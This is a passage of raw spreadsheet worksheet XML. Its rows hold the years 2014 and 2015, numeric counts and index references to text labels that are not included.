        <v>39</v>
      </c>
      <c r="I20" s="10">
        <v>4.0</v>
      </c>
      <c r="J20" s="12"/>
      <c r="K20" s="12"/>
      <c r="L20" s="12"/>
      <c r="M20" s="12"/>
      <c r="N20" s="12"/>
      <c r="O20" s="12"/>
      <c r="P20" s="12"/>
      <c r="Q20" s="12"/>
      <c r="R20" s="12"/>
      <c r="S20" s="12"/>
      <c r="T20" s="12"/>
      <c r="U20" s="12"/>
      <c r="V20" s="12"/>
      <c r="W20" s="12"/>
      <c r="X20" s="12"/>
      <c r="Y20" s="12"/>
      <c r="Z20" s="12"/>
      <c r="AA20" s="12"/>
      <c r="AB20" s="12"/>
      <c r="AC20" s="12"/>
    </row>
    <row r="21">
      <c r="A21" s="10">
        <v>2014.0</v>
      </c>
      <c r="B21" s="10" t="s">
        <v>135</v>
      </c>
      <c r="C21" s="10">
        <v>32.0</v>
      </c>
      <c r="D21" s="10" t="s">
        <v>137</v>
      </c>
      <c r="E21" s="10">
        <v>1.0</v>
      </c>
      <c r="F21" s="10" t="s">
        <v>139</v>
      </c>
      <c r="G21" s="10">
        <v>2.0</v>
      </c>
      <c r="H21" s="10" t="s">
        <v>17</v>
      </c>
      <c r="I21" s="10">
        <v>4.0</v>
      </c>
      <c r="J21" s="10" t="s">
        <v>18</v>
      </c>
      <c r="K21" s="10">
        <v>2.0</v>
      </c>
      <c r="L21" s="10" t="s">
        <v>140</v>
      </c>
      <c r="M21" s="10">
        <v>2.0</v>
      </c>
      <c r="N21" s="10" t="s">
        <v>20</v>
      </c>
      <c r="O21" s="10">
        <v>2.0</v>
      </c>
      <c r="P21" s="10" t="s">
        <v>141</v>
      </c>
      <c r="Q21" s="10">
        <v>1.0</v>
      </c>
      <c r="R21" s="10" t="s">
        <v>30</v>
      </c>
      <c r="S21" s="10">
        <v>6.0</v>
      </c>
      <c r="T21" s="10" t="s">
        <v>142</v>
      </c>
      <c r="U21" s="10">
        <v>2.0</v>
      </c>
      <c r="V21" s="10" t="s">
        <v>143</v>
      </c>
      <c r="W21" s="10">
        <v>1.0</v>
      </c>
      <c r="X21" s="10" t="s">
        <v>145</v>
      </c>
      <c r="Y21" s="10">
        <v>1.0</v>
      </c>
      <c r="Z21" s="10" t="s">
        <v>46</v>
      </c>
      <c r="AA21" s="10">
        <v>3.0</v>
      </c>
      <c r="AB21" s="10" t="s">
        <v>33</v>
      </c>
      <c r="AC21" s="10">
        <v>5.0</v>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="1">
        <v>2014.0</v>
      </c>
      <c r="B22" s="1" t="s">
        <v>148</v>
      </c>
      <c r="C22" s="1">
        <v>5.0</v>
      </c>
      <c r="D22" s="10" t="s">
        <v>34</v>
      </c>
      <c r="E22" s="10">
        <v>1.0</v>
      </c>
      <c r="F22" s="10" t="s">
        <v>18</v>
      </c>
      <c r="G22" s="10">
        <v>1.0</v>
      </c>
      <c r="H22" s="10" t="s">
        <v>20</v>
      </c>
      <c r="I22" s="10">
        <v>1.0</v>
      </c>
      <c r="J22" s="10" t="s">
        <v>31</v>
      </c>
      <c r="K22" s="10">
        <v>1.0</v>
      </c>
      <c r="L22" s="10" t="s">
        <v>149</v>
      </c>
      <c r="M22" s="10">
        <v>1.0</v>
      </c>
      <c r="N22" s="12"/>
      <c r="O22" s="12"/>
      <c r="P22" s="12"/>
      <c r="Q22" s="12"/>
      <c r="R22" s="12"/>
      <c r="S22" s="12"/>
      <c r="T22" s="12"/>
      <c r="U22" s="12"/>
      <c r="V22" s="12"/>
      <c r="W22" s="12"/>
      <c r="X22" s="12"/>
      <c r="Y22" s="12"/>
      <c r="Z22" s="12"/>
      <c r="AA22" s="12"/>
      <c r="AB22" s="12"/>
      <c r="AC22" s="12"/>
    </row>
    <row r="23">
      <c r="A23" s="10">
        <v>2014.0</v>
      </c>
      <c r="B23" s="10" t="s">
        <v>150</v>
      </c>
      <c r="C23" s="10">
        <v>10.0</v>
      </c>
      <c r="D23" s="10" t="s">
        <v>151</v>
      </c>
      <c r="E23" s="10">
        <v>2.0</v>
      </c>
      <c r="F23" s="10" t="s">
        <v>17</v>
      </c>
      <c r="G23" s="10">
        <v>1.0</v>
      </c>
      <c r="H23" s="10" t="s">
        <v>127</v>
      </c>
      <c r="I23" s="10">
        <v>1.0</v>
      </c>
      <c r="J23" s="10" t="s">
        <v>20</v>
      </c>
      <c r="K23" s="10">
        <v>3.0</v>
      </c>
      <c r="L23" s="10" t="s">
        <v>149</v>
      </c>
      <c r="M23" s="10">
        <v>1.0</v>
      </c>
      <c r="N23" s="10" t="s">
        <v>33</v>
      </c>
      <c r="O23" s="10">
        <v>2.0</v>
      </c>
      <c r="P23" s="12"/>
      <c r="Q23" s="12"/>
      <c r="R23" s="12"/>
      <c r="S23" s="12"/>
      <c r="T23" s="12"/>
      <c r="U23" s="12"/>
      <c r="V23" s="12"/>
      <c r="W23" s="12"/>
      <c r="X23" s="12"/>
      <c r="Y23" s="12"/>
      <c r="Z23" s="12"/>
      <c r="AA23" s="12"/>
      <c r="AB23" s="12"/>
      <c r="AC23" s="12"/>
    </row>
    <row r="24">
      <c r="A24" s="10">
        <v>2014.0</v>
      </c>
      <c r="B24" s="10" t="s">
        <v>158</v>
      </c>
      <c r="C24" s="10">
        <v>16.0</v>
      </c>
      <c r="D24" s="10" t="s">
        <v>17</v>
      </c>
      <c r="E24" s="10">
        <v>4.0</v>
      </c>
      <c r="F24" s="10" t="s">
        <v>18</v>
      </c>
      <c r="G24" s="10">
        <v>2.0</v>
      </c>
      <c r="H24" s="10" t="s">
        <v>20</v>
      </c>
      <c r="I24" s="10">
        <v>4.0</v>
      </c>
      <c r="J24" s="10" t="s">
        <v>149</v>
      </c>
      <c r="K24" s="10">
        <v>3.0</v>
      </c>
      <c r="L24" s="10" t="s">
        <v>33</v>
      </c>
      <c r="M24" s="10">
        <v>3.0</v>
      </c>
      <c r="N24" s="12"/>
      <c r="O24" s="12"/>
      <c r="P24" s="12"/>
      <c r="Q24" s="12"/>
      <c r="R24" s="12"/>
      <c r="S24" s="12"/>
      <c r="T24" s="12"/>
      <c r="U24" s="12"/>
      <c r="V24" s="12"/>
      <c r="W24" s="12"/>
      <c r="X24" s="12"/>
      <c r="Y24" s="12"/>
      <c r="Z24" s="12"/>
      <c r="AA24" s="12"/>
      <c r="AB24" s="12"/>
      <c r="AC24" s="12"/>
    </row>
    <row r="25">
      <c r="A25" s="10">
        <v>2014.0</v>
      </c>
      <c r="B25" s="10" t="s">
        <v>163</v>
      </c>
      <c r="C25" s="10">
        <v>25.0</v>
      </c>
      <c r="D25" s="10" t="s">
        <v>15</v>
      </c>
      <c r="E25" s="10">
        <v>5.0</v>
      </c>
      <c r="F25" s="10" t="s">
        <v>17</v>
      </c>
      <c r="G25" s="10">
        <v>5.0</v>
      </c>
      <c r="H25" s="10" t="s">
        <v>20</v>
      </c>
      <c r="I25" s="10">
        <v>5.0</v>
      </c>
      <c r="J25" s="10" t="s">
        <v>30</v>
      </c>
      <c r="K25" s="10">
        <v>5.0</v>
      </c>
      <c r="L25" s="10" t="s">
        <v>33</v>
      </c>
      <c r="M25" s="10">
        <v>5.0</v>
      </c>
      <c r="N25" s="12"/>
      <c r="O25" s="12"/>
      <c r="P25" s="12"/>
      <c r="Q25" s="12"/>
      <c r="R25" s="12"/>
      <c r="S25" s="12"/>
      <c r="T25" s="12"/>
      <c r="U25" s="12"/>
      <c r="V25" s="12"/>
      <c r="W25" s="12"/>
      <c r="X25" s="12"/>
      <c r="Y25" s="12"/>
      <c r="Z25" s="12"/>
      <c r="AA25" s="12"/>
      <c r="AB25" s="12"/>
      <c r="AC25" s="12"/>
    </row>
    <row r="26">
      <c r="A26" s="10">
        <v>2014.0</v>
      </c>
      <c r="B26" s="10" t="s">
        <v>171</v>
      </c>
      <c r="C26" s="10">
        <v>14.0</v>
      </c>
      <c r="D26" s="10" t="s">
        <v>53</v>
      </c>
      <c r="E26" s="10">
        <v>14.0</v>
      </c>
      <c r="F26" s="12"/>
      <c r="G26" s="12"/>
      <c r="H26" s="12"/>
      <c r="I26" s="12"/>
      <c r="J26" s="12"/>
      <c r="K26" s="12"/>
      <c r="L26" s="12"/>
      <c r="M26" s="12"/>
      <c r="N26" s="12"/>
      <c r="O26" s="12"/>
      <c r="P26" s="12"/>
      <c r="Q26" s="12"/>
      <c r="R26" s="12"/>
      <c r="S26" s="12"/>
      <c r="T26" s="12"/>
      <c r="U26" s="12"/>
      <c r="V26" s="12"/>
      <c r="W26" s="12"/>
      <c r="X26" s="12"/>
      <c r="Y26" s="12"/>
      <c r="Z26" s="12"/>
      <c r="AA26" s="12"/>
      <c r="AB26" s="12"/>
      <c r="AC26" s="12"/>
    </row>
    <row r="27">
      <c r="A27" s="10">
        <v>2014.0</v>
      </c>
      <c r="B27" s="10" t="s">
        <v>173</v>
      </c>
      <c r="C27" s="10">
        <v>21.0</v>
      </c>
      <c r="D27" s="10" t="s">
        <v>175</v>
      </c>
      <c r="E27" s="10">
        <v>1.0</v>
      </c>
      <c r="F27" s="10" t="s">
        <v>17</v>
      </c>
      <c r="G27" s="10">
        <v>5.0</v>
      </c>
      <c r="H27" s="10" t="s">
        <v>176</v>
      </c>
      <c r="I27" s="10">
        <v>1.0</v>
      </c>
      <c r="J27" s="10" t="s">
        <v>18</v>
      </c>
      <c r="K27" s="10">
        <v>5.0</v>
      </c>
      <c r="L27" s="10" t="s">
        <v>133</v>
      </c>
      <c r="M27" s="10">
        <v>2.0</v>
      </c>
      <c r="N27" s="10" t="s">
        <v>39</v>
      </c>
      <c r="O27" s="10">
        <v>1.0</v>
      </c>
      <c r="P27" s="10" t="s">
        <v>177</v>
      </c>
      <c r="Q27" s="10">
        <v>4.0</v>
      </c>
      <c r="R27" s="10" t="s">
        <v>178</v>
      </c>
      <c r="S27" s="10">
        <v>4.0</v>
      </c>
      <c r="T27" s="10" t="s">
        <v>33</v>
      </c>
      <c r="U27" s="10">
        <v>5.0</v>
      </c>
      <c r="V27" s="12"/>
      <c r="W27" s="12"/>
      <c r="X27" s="12"/>
      <c r="Y27" s="12"/>
      <c r="Z27" s="12"/>
      <c r="AA27" s="12"/>
      <c r="AB27" s="12"/>
      <c r="AC27" s="12"/>
    </row>
    <row r="28">
      <c r="A28" s="10">
        <v>2014.0</v>
      </c>
      <c r="B28" s="10" t="s">
        <v>180</v>
      </c>
      <c r="C28" s="10">
        <v>24.0</v>
      </c>
      <c r="D28" s="10" t="s">
        <v>17</v>
      </c>
      <c r="E28" s="10">
        <v>1.0</v>
      </c>
      <c r="F28" s="10" t="s">
        <v>18</v>
      </c>
      <c r="G28" s="10">
        <v>2.0</v>
      </c>
      <c r="H28" s="10" t="s">
        <v>190</v>
      </c>
      <c r="I28" s="10">
        <v>1.0</v>
      </c>
      <c r="J28" s="10" t="s">
        <v>20</v>
      </c>
      <c r="K28" s="10">
        <v>6.0</v>
      </c>
      <c r="L28" s="10" t="s">
        <v>124</v>
      </c>
      <c r="M28" s="10">
        <v>3.0</v>
      </c>
      <c r="N28" s="10" t="s">
        <v>30</v>
      </c>
      <c r="O28" s="10">
        <v>1.0</v>
      </c>
      <c r="P28" s="10" t="s">
        <v>177</v>
      </c>
      <c r="Q28" s="10">
        <v>6.0</v>
      </c>
      <c r="R28" s="10" t="s">
        <v>149</v>
      </c>
      <c r="S28" s="10">
        <v>2.0</v>
      </c>
      <c r="T28" s="10" t="s">
        <v>33</v>
      </c>
      <c r="U28" s="10">
        <v>2.0</v>
      </c>
      <c r="V28" s="12"/>
      <c r="W28" s="12"/>
      <c r="X28" s="12"/>
      <c r="Y28" s="12"/>
      <c r="Z28" s="12"/>
      <c r="AA28" s="12"/>
      <c r="AB28" s="12"/>
      <c r="AC28" s="12"/>
    </row>
    <row r="29">
      <c r="A29" s="10">
        <v>2014.0</v>
      </c>
      <c r="B29" s="10" t="s">
        <v>197</v>
      </c>
      <c r="C29" s="10">
        <v>17.0</v>
      </c>
      <c r="D29" s="10" t="s">
        <v>15</v>
      </c>
      <c r="E29" s="10">
        <v>2.0</v>
      </c>
      <c r="F29" s="10" t="s">
        <v>17</v>
      </c>
      <c r="G29" s="10">
        <v>2.0</v>
      </c>
      <c r="H29" s="10" t="s">
        <v>18</v>
      </c>
      <c r="I29" s="10">
        <v>1.0</v>
      </c>
      <c r="J29" s="10" t="s">
        <v>20</v>
      </c>
      <c r="K29" s="10">
        <v>2.0</v>
      </c>
      <c r="L29" s="10" t="s">
        <v>30</v>
      </c>
      <c r="M29" s="10">
        <v>5.0</v>
      </c>
      <c r="N29" s="10" t="s">
        <v>178</v>
      </c>
      <c r="O29" s="10">
        <v>2.0</v>
      </c>
      <c r="P29" s="10" t="s">
        <v>33</v>
      </c>
      <c r="Q29" s="10">
        <v>4.0</v>
      </c>
      <c r="R29" s="12"/>
      <c r="S29" s="12"/>
      <c r="T29" s="12"/>
      <c r="U29" s="12"/>
      <c r="V29" s="12"/>
      <c r="W29" s="12"/>
      <c r="X29" s="12"/>
      <c r="Y29" s="12"/>
      <c r="Z29" s="12"/>
      <c r="AA29" s="12"/>
      <c r="AB29" s="12"/>
      <c r="AC29" s="12"/>
    </row>
    <row r="30">
      <c r="A30" s="10">
        <v>2014.0</v>
      </c>
      <c r="B30" s="10" t="s">
        <v>198</v>
      </c>
      <c r="C30" s="10">
        <v>49.0</v>
      </c>
      <c r="D30" s="10" t="s">
        <v>175</v>
      </c>
      <c r="E30" s="10">
        <v>4.0</v>
      </c>
      <c r="F30" s="10" t="s">
        <v>17</v>
      </c>
      <c r="G30" s="10">
        <v>4.0</v>
      </c>
      <c r="H30" s="10" t="s">
        <v>18</v>
      </c>
      <c r="I30" s="10">
        <v>4.0</v>
      </c>
      <c r="J30" s="10" t="s">
        <v>200</v>
      </c>
      <c r="K30" s="10">
        <v>4.0</v>
      </c>
      <c r="L30" s="10" t="s">
        <v>20</v>
      </c>
      <c r="M30" s="10">
        <v>4.0</v>
      </c>
      <c r="N30" s="10" t="s">
        <v>39</v>
      </c>
      <c r="O30" s="10">
        <v>3.0</v>
      </c>
      <c r="P30" s="10" t="s">
        <v>41</v>
      </c>
      <c r="Q30" s="10">
        <v>5.0</v>
      </c>
      <c r="R30" s="10" t="s">
        <v>31</v>
      </c>
      <c r="S30" s="10">
        <v>6.0</v>
      </c>
      <c r="T30" s="10" t="s">
        <v>149</v>
      </c>
      <c r="U30" s="10">
        <v>5.0</v>
      </c>
      <c r="V30" s="10" t="s">
        <v>204</v>
      </c>
      <c r="W30" s="10">
        <v>5.0</v>
      </c>
      <c r="X30" s="10" t="s">
        <v>33</v>
      </c>
      <c r="Y30" s="10">
        <v>4.0</v>
      </c>
      <c r="Z30" s="12"/>
      <c r="AA30" s="12"/>
      <c r="AB30" s="12"/>
      <c r="AC30" s="12"/>
    </row>
    <row r="31">
      <c r="A31" s="1">
        <v>2014.0</v>
      </c>
      <c r="B31" s="1" t="s">
        <v>205</v>
      </c>
      <c r="C31" s="1">
        <v>7.0</v>
      </c>
      <c r="D31" s="10" t="s">
        <v>53</v>
      </c>
      <c r="E31" s="10">
        <v>7.0</v>
      </c>
      <c r="F31" s="12"/>
      <c r="G31" s="12"/>
      <c r="H31" s="12"/>
      <c r="I31" s="12"/>
      <c r="J31" s="12"/>
      <c r="K31" s="12"/>
      <c r="L31" s="12"/>
      <c r="M31" s="12"/>
      <c r="N31" s="12"/>
      <c r="O31" s="12"/>
      <c r="P31" s="12"/>
      <c r="Q31" s="12"/>
      <c r="R31" s="12"/>
      <c r="S31" s="12"/>
      <c r="T31" s="12"/>
      <c r="U31" s="12"/>
      <c r="V31" s="12"/>
      <c r="W31" s="12"/>
      <c r="X31" s="12"/>
      <c r="Y31" s="12"/>
      <c r="Z31" s="12"/>
      <c r="AA31" s="12"/>
      <c r="AB31" s="12"/>
      <c r="AC31" s="12"/>
    </row>
    <row r="32">
      <c r="A32" s="10">
        <v>2014.0</v>
      </c>
      <c r="B32" s="10" t="s">
        <v>206</v>
      </c>
      <c r="C32" s="10">
        <v>29.0</v>
      </c>
      <c r="D32" s="10" t="s">
        <v>15</v>
      </c>
      <c r="E32" s="10">
        <v>3.0</v>
      </c>
      <c r="F32" s="10" t="s">
        <v>17</v>
      </c>
      <c r="G32" s="10">
        <v>3.0</v>
      </c>
      <c r="H32" s="10" t="s">
        <v>207</v>
      </c>
      <c r="I32" s="10">
        <v>4.0</v>
      </c>
      <c r="J32" s="10" t="s">
        <v>18</v>
      </c>
      <c r="K32" s="10">
        <v>4.0</v>
      </c>
      <c r="L32" s="10" t="s">
        <v>133</v>
      </c>
      <c r="M32" s="10">
        <v>3.0</v>
      </c>
      <c r="N32" s="10" t="s">
        <v>124</v>
      </c>
      <c r="O32" s="10">
        <v>2.0</v>
      </c>
      <c r="P32" s="10" t="s">
        <v>208</v>
      </c>
      <c r="Q32" s="10">
        <v>3.0</v>
      </c>
      <c r="R32" s="10" t="s">
        <v>209</v>
      </c>
      <c r="S32" s="10">
        <v>2.0</v>
      </c>
      <c r="T32" s="10" t="s">
        <v>33</v>
      </c>
      <c r="U32" s="10">
        <v>5.0</v>
      </c>
      <c r="V32" s="12"/>
      <c r="W32" s="12"/>
      <c r="X32" s="12"/>
      <c r="Y32" s="12"/>
      <c r="Z32" s="12"/>
      <c r="AA32" s="12"/>
      <c r="AB32" s="12"/>
      <c r="AC32" s="12"/>
    </row>
    <row r="33">
      <c r="A33" s="10">
        <v>2014.0</v>
      </c>
      <c r="B33" s="10" t="s">
        <v>210</v>
      </c>
      <c r="C33" s="10">
        <v>13.0</v>
      </c>
      <c r="D33" s="10" t="s">
        <v>212</v>
      </c>
      <c r="E33" s="10">
        <v>1.0</v>
      </c>
      <c r="F33" s="10" t="s">
        <v>17</v>
      </c>
      <c r="G33" s="10">
        <v>1.0</v>
      </c>
      <c r="H33" s="10" t="s">
        <v>20</v>
      </c>
      <c r="I33" s="10">
        <v>1.0</v>
      </c>
      <c r="J33" s="10" t="s">
        <v>215</v>
      </c>
      <c r="K33" s="10">
        <v>1.0</v>
      </c>
      <c r="L33" s="10" t="s">
        <v>30</v>
      </c>
      <c r="M33" s="10">
        <v>1.0</v>
      </c>
      <c r="N33" s="10" t="s">
        <v>31</v>
      </c>
      <c r="O33" s="10">
        <v>4.0</v>
      </c>
      <c r="P33" s="10" t="s">
        <v>143</v>
      </c>
      <c r="Q33" s="10">
        <v>1.0</v>
      </c>
      <c r="R33" s="10" t="s">
        <v>216</v>
      </c>
      <c r="S33" s="10">
        <v>1.0</v>
      </c>
      <c r="T33" s="10" t="s">
        <v>33</v>
      </c>
      <c r="U33" s="10">
        <v>2.0</v>
      </c>
      <c r="V33" s="12"/>
      <c r="W33" s="12"/>
      <c r="X33" s="12"/>
      <c r="Y33" s="12"/>
      <c r="Z33" s="12"/>
      <c r="AA33" s="12"/>
      <c r="AB33" s="12"/>
      <c r="AC33" s="12"/>
    </row>
    <row r="34">
      <c r="A34" s="10">
        <v>2014.0</v>
      </c>
      <c r="B34" s="10" t="s">
        <v>217</v>
      </c>
      <c r="C34" s="10">
        <v>35.0</v>
      </c>
      <c r="D34" s="10" t="s">
        <v>17</v>
      </c>
      <c r="E34" s="10">
        <v>7.0</v>
      </c>
      <c r="F34" s="10" t="s">
        <v>18</v>
      </c>
      <c r="G34" s="10">
        <v>6.0</v>
      </c>
      <c r="H34" s="10" t="s">
        <v>133</v>
      </c>
      <c r="I34" s="10">
        <v>1.0</v>
      </c>
      <c r="J34" s="10" t="s">
        <v>218</v>
      </c>
      <c r="K34" s="10">
        <v>1.0</v>
      </c>
      <c r="L34" s="10" t="s">
        <v>41</v>
      </c>
      <c r="M34" s="10">
        <v>8.0</v>
      </c>
      <c r="N34" s="10" t="s">
        <v>31</v>
      </c>
      <c r="O34" s="10">
        <v>5.0</v>
      </c>
      <c r="P34" s="10" t="s">
        <v>219</v>
      </c>
      <c r="Q34" s="10">
        <v>1.0</v>
      </c>
      <c r="R34" s="10" t="s">
        <v>149</v>
      </c>
      <c r="S34" s="10">
        <v>5.0</v>
      </c>
      <c r="T34" s="10" t="s">
        <v>33</v>
      </c>
      <c r="U34" s="10">
        <v>6.0</v>
      </c>
      <c r="V34" s="12"/>
      <c r="W34" s="12"/>
      <c r="X34" s="12"/>
      <c r="Y34" s="12"/>
      <c r="Z34" s="12"/>
      <c r="AA34" s="12"/>
      <c r="AB34" s="12"/>
      <c r="AC34" s="12"/>
    </row>
    <row r="35">
      <c r="A35" s="10">
        <v>2014.0</v>
      </c>
      <c r="B35" s="10" t="s">
        <v>220</v>
      </c>
      <c r="C35" s="10">
        <v>14.0</v>
      </c>
      <c r="D35" s="10" t="s">
        <v>17</v>
      </c>
      <c r="E35" s="10">
        <v>3.0</v>
      </c>
      <c r="F35" s="10" t="s">
        <v>34</v>
      </c>
      <c r="G35" s="10">
        <v>2.0</v>
      </c>
      <c r="H35" s="10" t="s">
        <v>20</v>
      </c>
      <c r="I35" s="10">
        <v>3.0</v>
      </c>
      <c r="J35" s="10" t="s">
        <v>31</v>
      </c>
      <c r="K35" s="10">
        <v>3.0</v>
      </c>
      <c r="L35" s="10" t="s">
        <v>149</v>
      </c>
      <c r="M35" s="10">
        <v>1.0</v>
      </c>
      <c r="N35" s="10" t="s">
        <v>33</v>
      </c>
      <c r="O35" s="10">
        <v>2.0</v>
      </c>
      <c r="P35" s="12"/>
      <c r="Q35" s="12"/>
      <c r="R35" s="12"/>
      <c r="S35" s="12"/>
      <c r="T35" s="12"/>
      <c r="U35" s="12"/>
      <c r="V35" s="12"/>
      <c r="W35" s="12"/>
      <c r="X35" s="12"/>
      <c r="Y35" s="12"/>
      <c r="Z35" s="12"/>
      <c r="AA35" s="12"/>
      <c r="AB35" s="12"/>
      <c r="AC35" s="12"/>
    </row>
    <row r="36">
      <c r="A36" s="10">
        <v>2014.0</v>
      </c>
      <c r="B36" s="10" t="s">
        <v>223</v>
      </c>
      <c r="C36" s="10">
        <v>40.0</v>
      </c>
      <c r="D36" s="10" t="s">
        <v>175</v>
      </c>
      <c r="E36" s="10">
        <v>5.0</v>
      </c>
      <c r="F36" s="10" t="s">
        <v>17</v>
      </c>
      <c r="G36" s="10">
        <v>5.0</v>
      </c>
      <c r="H36" s="10" t="s">
        <v>207</v>
      </c>
      <c r="I36" s="10">
        <v>5.0</v>
      </c>
      <c r="J36" s="10" t="s">
        <v>225</v>
      </c>
      <c r="K36" s="10">
        <v>5.0</v>
      </c>
      <c r="L36" s="10" t="s">
        <v>41</v>
      </c>
      <c r="M36" s="10">
        <v>5.0</v>
      </c>
      <c r="N36" s="10" t="s">
        <v>177</v>
      </c>
      <c r="O36" s="10">
        <v>5.0</v>
      </c>
      <c r="P36" s="10" t="s">
        <v>229</v>
      </c>
      <c r="Q36" s="10">
        <v>5.0</v>
      </c>
      <c r="R36" s="10" t="s">
        <v>33</v>
      </c>
      <c r="S36" s="10">
        <v>5.0</v>
      </c>
      <c r="T36" s="12"/>
      <c r="U36" s="12"/>
      <c r="V36" s="12"/>
      <c r="W36" s="12"/>
      <c r="X36" s="12"/>
      <c r="Y36" s="12"/>
      <c r="Z36" s="12"/>
      <c r="AA36" s="12"/>
      <c r="AB36" s="12"/>
      <c r="AC36" s="12"/>
    </row>
    <row r="37">
      <c r="A37" s="1">
        <v>2014.0</v>
      </c>
      <c r="B37" s="1" t="s">
        <v>233</v>
      </c>
      <c r="C37" s="1">
        <v>1.0</v>
      </c>
      <c r="D37" s="10" t="s">
        <v>151</v>
      </c>
      <c r="E37" s="10">
        <v>1.0</v>
      </c>
      <c r="F37" s="12"/>
      <c r="G37" s="12"/>
      <c r="H37" s="12"/>
      <c r="I37" s="12"/>
      <c r="J37" s="12"/>
      <c r="K37" s="12"/>
      <c r="L37" s="12"/>
      <c r="M37" s="12"/>
      <c r="N37" s="12"/>
      <c r="O37" s="12"/>
      <c r="P37" s="12"/>
      <c r="Q37" s="12"/>
      <c r="R37" s="12"/>
      <c r="S37" s="12"/>
      <c r="T37" s="12"/>
      <c r="U37" s="12"/>
      <c r="V37" s="12"/>
      <c r="W37" s="12"/>
      <c r="X37" s="12"/>
      <c r="Y37" s="12"/>
      <c r="Z37" s="12"/>
      <c r="AA37" s="12"/>
      <c r="AB37" s="12"/>
      <c r="AC37" s="12"/>
    </row>
    <row r="38">
      <c r="A38" s="1">
        <v>2014.0</v>
      </c>
      <c r="B38" s="1" t="s">
        <v>188</v>
      </c>
      <c r="C38" s="1">
        <v>2.0</v>
      </c>
      <c r="D38" s="10" t="s">
        <v>53</v>
      </c>
      <c r="E38" s="10">
        <v>2.0</v>
      </c>
      <c r="F38" s="12"/>
      <c r="G38" s="12"/>
      <c r="H38" s="12"/>
      <c r="I38" s="12"/>
      <c r="J38" s="12"/>
      <c r="K38" s="12"/>
      <c r="L38" s="12"/>
      <c r="M38" s="12"/>
      <c r="N38" s="12"/>
      <c r="O38" s="12"/>
      <c r="P38" s="12"/>
      <c r="Q38" s="12"/>
      <c r="R38" s="12"/>
      <c r="S38" s="12"/>
      <c r="T38" s="12"/>
      <c r="U38" s="12"/>
      <c r="V38" s="12"/>
      <c r="W38" s="12"/>
      <c r="X38" s="12"/>
      <c r="Y38" s="12"/>
      <c r="Z38" s="12"/>
      <c r="AA38" s="12"/>
      <c r="AB38" s="12"/>
      <c r="AC38" s="12"/>
    </row>
    <row r="39">
      <c r="A39" s="1">
        <v>2014.0</v>
      </c>
      <c r="B39" s="1" t="s">
        <v>239</v>
      </c>
      <c r="C39" s="1">
        <v>5.0</v>
      </c>
      <c r="D39" s="10" t="s">
        <v>53</v>
      </c>
      <c r="E39" s="10">
        <v>5.0</v>
      </c>
      <c r="F39" s="12"/>
      <c r="G39" s="12"/>
      <c r="H39" s="12"/>
      <c r="I39" s="12"/>
      <c r="J39" s="12"/>
      <c r="K39" s="12"/>
      <c r="L39" s="12"/>
      <c r="M39" s="12"/>
      <c r="N39" s="12"/>
      <c r="O39" s="12"/>
      <c r="P39" s="12"/>
      <c r="Q39" s="12"/>
      <c r="R39" s="12"/>
      <c r="S39" s="12"/>
      <c r="T39" s="12"/>
      <c r="U39" s="12"/>
      <c r="V39" s="12"/>
      <c r="W39" s="12"/>
      <c r="X39" s="12"/>
      <c r="Y39" s="12"/>
      <c r="Z39" s="12"/>
      <c r="AA39" s="12"/>
      <c r="AB39" s="12"/>
      <c r="AC39" s="12"/>
    </row>
    <row r="40">
      <c r="A40" s="10">
        <v>2015.0</v>
      </c>
      <c r="B40" s="25" t="s">
        <v>241</v>
      </c>
      <c r="C40" s="27">
        <v>30.0</v>
      </c>
      <c r="D40" s="27" t="s">
        <v>247</v>
      </c>
      <c r="E40" s="27">
        <v>4.0</v>
      </c>
      <c r="F40" s="27" t="s">
        <v>248</v>
      </c>
      <c r="G40" s="27">
        <v>5.0</v>
      </c>
      <c r="H40" s="27" t="s">
        <v>249</v>
      </c>
      <c r="I40" s="27">
        <v>7.0</v>
      </c>
      <c r="J40" s="27" t="s">
        <v>250</v>
      </c>
      <c r="K40" s="27">
        <v>4.0</v>
      </c>
      <c r="L40" s="27" t="s">
        <v>251</v>
      </c>
      <c r="M40" s="27">
        <v>5.0</v>
      </c>
      <c r="N40" s="27" t="s">
        <v>245</v>
      </c>
      <c r="O40" s="27">
        <v>5.0</v>
      </c>
      <c r="P40" s="12"/>
      <c r="Q40" s="12"/>
      <c r="R40" s="12"/>
      <c r="S40" s="12"/>
      <c r="T40" s="12"/>
      <c r="U40" s="12"/>
      <c r="V40" s="12"/>
      <c r="W40" s="12"/>
      <c r="X40" s="12"/>
      <c r="Y40" s="12"/>
      <c r="Z40" s="12"/>
      <c r="AA40" s="12"/>
      <c r="AB40" s="12"/>
      <c r="AC40" s="12"/>
    </row>
    <row r="41">
      <c r="A41" s="10">
        <v>2015.0</v>
      </c>
      <c r="B41" s="25" t="s">
        <v>252</v>
      </c>
      <c r="C41" s="27">
        <v>28.0</v>
      </c>
      <c r="D41" s="27" t="s">
        <v>253</v>
      </c>
      <c r="E41" s="27">
        <v>4.0</v>
      </c>
      <c r="F41" s="27" t="s">
        <v>254</v>
      </c>
      <c r="G41" s="27">
        <v>2.0</v>
      </c>
      <c r="H41" s="27" t="s">
        <v>249</v>
      </c>
      <c r="I41" s="27">
        <v>3.0</v>
      </c>
      <c r="J41" s="27" t="s">
        <v>255</v>
      </c>
      <c r="K41" s="27">
        <v>9.0</v>
      </c>
      <c r="L41" s="27" t="s">
        <v>256</v>
      </c>
      <c r="M41" s="27">
        <v>5.0</v>
      </c>
      <c r="N41" s="27" t="s">
        <v>245</v>
      </c>
      <c r="O41" s="27">
        <v>5.0</v>
      </c>
      <c r="P41" s="12"/>
      <c r="Q41" s="12"/>
      <c r="R41" s="12"/>
      <c r="S41" s="12"/>
      <c r="T41" s="12"/>
      <c r="U41" s="12"/>
      <c r="V41" s="12"/>
      <c r="W41" s="12"/>
      <c r="X41" s="12"/>
      <c r="Y41" s="12"/>
      <c r="Z41" s="12"/>
      <c r="AA41" s="12"/>
      <c r="AB41" s="12"/>
      <c r="AC41" s="12"/>
    </row>
    <row r="42">
      <c r="A42" s="10">
        <v>2015.0</v>
      </c>
      <c r="B42" s="25" t="s">
        <v>258</v>
      </c>
      <c r="C42" s="27">
        <v>34.0</v>
      </c>
      <c r="D42" s="27" t="s">
        <v>247</v>
      </c>
      <c r="E42" s="27">
        <v>5.0</v>
      </c>
      <c r="F42" s="27" t="s">
        <v>259</v>
      </c>
      <c r="G42" s="27">
        <v>9.0</v>
      </c>
      <c r="H42" s="27" t="s">
        <v>249</v>
      </c>
      <c r="I42" s="27">
        <v>6.0</v>
      </c>
      <c r="J42" s="27" t="s">
        <v>256</v>
      </c>
      <c r="K42" s="27">
